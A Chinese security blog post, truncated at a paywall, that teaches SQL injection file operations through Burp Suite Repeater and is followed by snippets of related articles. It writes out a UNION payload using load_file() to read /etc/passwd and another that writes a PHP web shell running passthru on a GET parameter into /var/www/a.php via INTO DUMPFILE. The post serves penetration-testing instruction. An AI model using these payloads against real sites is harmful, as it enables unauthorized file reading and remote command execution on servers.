sql注入2————对系统文件的操作

最新推荐文章于 2025-06-12 17:08:53 发布
原创 最新推荐文章于 2025-06-12 17:08:53 发布 · 602 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #sql注入 #web渗透 #渗透测试

本文探讨了SQL注入中如何利用Burpsuite进行系统文件的操作,包括读取和写入文件,以及编码绕过策略。文章指出,尽管可以成功上传文件,但因权限限制无法直接利用,强调了合理配置数据库权限在防护中的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上一篇文档介绍了sql注入的一些原理和查询方式,这一篇算是作为一个拓展思路;并且这里重新介绍一种工具burpsuite,虽然也是利用url提交,但是更简洁一些

burpsuite准备

1、我们现在sql注入界面截断代理,随机提交一个参数;然后转向burp选择正确的请求;然后发送到repeater(如下图);
在这里插入图片描述
2、在repeater下选择params可以直接更改参数重复提交验证;
在这里插入图片描述

读取文件(假设有读取权限)

数据库查询语句中有一个函数load_file()可以提供查询系统文件信息

命令:' union select null,load_file('系统文件地址')--+
图例查看了/etc/passwd文件,如图在界面显示了哦(raw也有)

在这里插入图片描述

写入文件

我们在第二个参数写入一句话木马通过函数dumpfile上传到/var/www.目录下;
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+
这是一个最理想的目录,这一我们就可以在当前页面响应到我们的木马

最低0.47元/天 解锁文章

200万优质内容无限畅学
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1953
注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
SQL注入文件操作
qq_43936524的博客
04-15 817
文章目录函数写文件前提条件写入函数日志写文件前提条件日志种类慢查询日志读文件前提条件读取函数参考文章 函数写文件 前提条件 1.有网站的绝对路径 2.数据库secure_file_priv包含了写入的路径 secure_file_priv secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。 secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。 secure_file_priv 没有值时,表示不限
web渗透-SQL注入文件操作
豆豆不在了
03-01 1045
SQL文件操作原理 在判定数据库连接权限的条件下,利用SQL操作函数 SELECT LOAD_FILE('E://test.txt') #下载文件 or SELECT 'nihao' INTO OUTFILE 'E://test1.txt' #上传写入文件 语句对网站服务器进行本地文件操作。 一般只有root连接用户才能进行文件操作。 攻击步骤: 1.获
BugKu Web渗透之各种绕过哟
最新发布
cai_huaer的博客
06-12 355
看代码,就是需要三个参数,其中id和uname是get请求,passwd是post请求。然后uname和passed不能相等,但是他们的sha1值需要全等于(类型也要一样),id参数的值在url解码后为margin。当然,也可以在bp中直接更改加参数,我个人觉得hacker bar更加方便。再想想,如果都是数组的话经过加密后也是Null,那么这样对比应该也是一样的,于是尝试把uname和passwd改成数组。首先因为是英文margin,所以url加密后也是margin。尝试请求,结果flag出现,如下图。
sql注入系统学习
wanan的博客
10-09 434
sql注入系统学习
SQl注入文件上传及sqli-labs第七关less-7
wanggonghanfei的博客
10-06 1776
参数secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能导出导入。secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。可以使用下面语句查看该值:secure_file_priv的值可以修改,在MySQL安装路径下的my.ini文件中因为此次测试需要读写权限,我将其值修改为我的网站根目录。然后查询。
SQL注入防护——从一款注入工具入侵原理入手.pdf
09-19
SQL注入是一种常见的网络攻击手段,攻击者通过在Web应用程序的输入字段中插入恶意的SQL代码片段,使得原本用于数据查询和管理的SQL语句被篡改,从而让攻击者能够绕过应用程序的安全限制,直接对数据库进行操作SQL...
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 ... 数据库角色–针对某个特定... 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)。
SQL注入简单总结——过滤逗号注入.pdf
04-08
"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的SQL注入情况。在SQL语句中,逗号常用于分隔不同的元素,例如在`UNION`、`LIMIT`等子句中。 1. **过滤逗号的绕过方法**: ...
SQL之利用操作系统
Jim的博客
08-15 744
二.执行操作系统命令 提升权限(获取管理员权限): 1.SQL Server openrowset命令:SQL Server 2000上,所有用户均可调用openrowset, 而在SQL Server 2005上,该操作默认被禁用 2.Oracle 在Oracle中,通过web应用的SQL注入来提升权限非常困难。大多数提升权限的方法均需要PL/SQL注入。 执行操作系统命令: 1.
sqlserver中如何使用操作系统文件?如何读写文件?--抄录
ycs_wokao的博客
06-02 229
请问在sqlserver中如何使用操作系统文件?如何读写文件? DECLARE @object int DECLARE @hr int DECLARE @src varchar(255), @desc varchar(255) Declare @tmp int declare @msg varchar(3000) SET @msg=‘Hello...
请问在sqlserver中如何使用操作系统文件?如何读写文件
It's my life
07-11 752
  DECLARE   @object   int     DECLARE   @hr   int     DECLARE   @src   varchar(255),   @desc   varchar(255)     Declare   @tmp   int     declare   @msg   varchar(3000)         SET   @msg=Hello.   MS
sql注入2
jonhswei的博客
04-14 777
高权限注入定义: 高权限注入是指通过SQL注入攻击,获取到数据库的高权限用户(如root)的访问权限,从而能够对服务器上的所有数据库进行读写操作。背景说明: 在实际工作或实战中,当我们发现某个网站存在SQL注入漏洞时,如果我们的账号是高权限用户,那么我们不仅可以访问当前数据库的数据,还可以利用这个漏洞去访问其他网站的数据库。高权限注入核心: 高权限注入的核心在于利用高权限用户对多个网站进行管辖的能力,获取到普通用户无法访问的数据。
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 2182
【实训04】数据库SQL注入漏洞
SQL注入技术
qq_25981849的博客
02-14 496
SQL注入技术 漏洞成因 SQL注入漏洞的原因是由于程序员没有严格过滤用户输入,导致用户输入语句与数据库语句拼接成了一个新的合法语句所产生的漏洞。 SQL注入应用技术 SQL注入可以用来读取文件、写入文件、执行系统命令。 SQL注入的不同类型和常用函数 有回显的注入 有回显的漏洞直接走一遍标准流程就行了 报错注入 有的时候页面会显示sql报错,在这种情况下,我们可以通过人为的报错将不可见的信息转换在错误信息显示出来。 updatexml报错注入 uname=Dumb&passwd=0' or upd
SQL注入读写文件
weixin_43765321的博客
03-02 3846
1. 读写文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件可读。 文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
如何通过SQL注入获取服务器本地文件
weixin_34138056的博客
03-29 565
  写在前面的话 SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。 在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞的SQL语句并从远...
掌握SQL注入利器——sqlmap-0.9版本发布
1. SQL注入技术:SQL注入是一种代码注入技术,攻击者利用web应用的安全漏洞,通过SQL命令对数据库进行未授权的查询、修改、添加或删除操作Sqlmap是自动化执行这些操作的工具之一。 2. 数据库管理系统(DBMS):...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值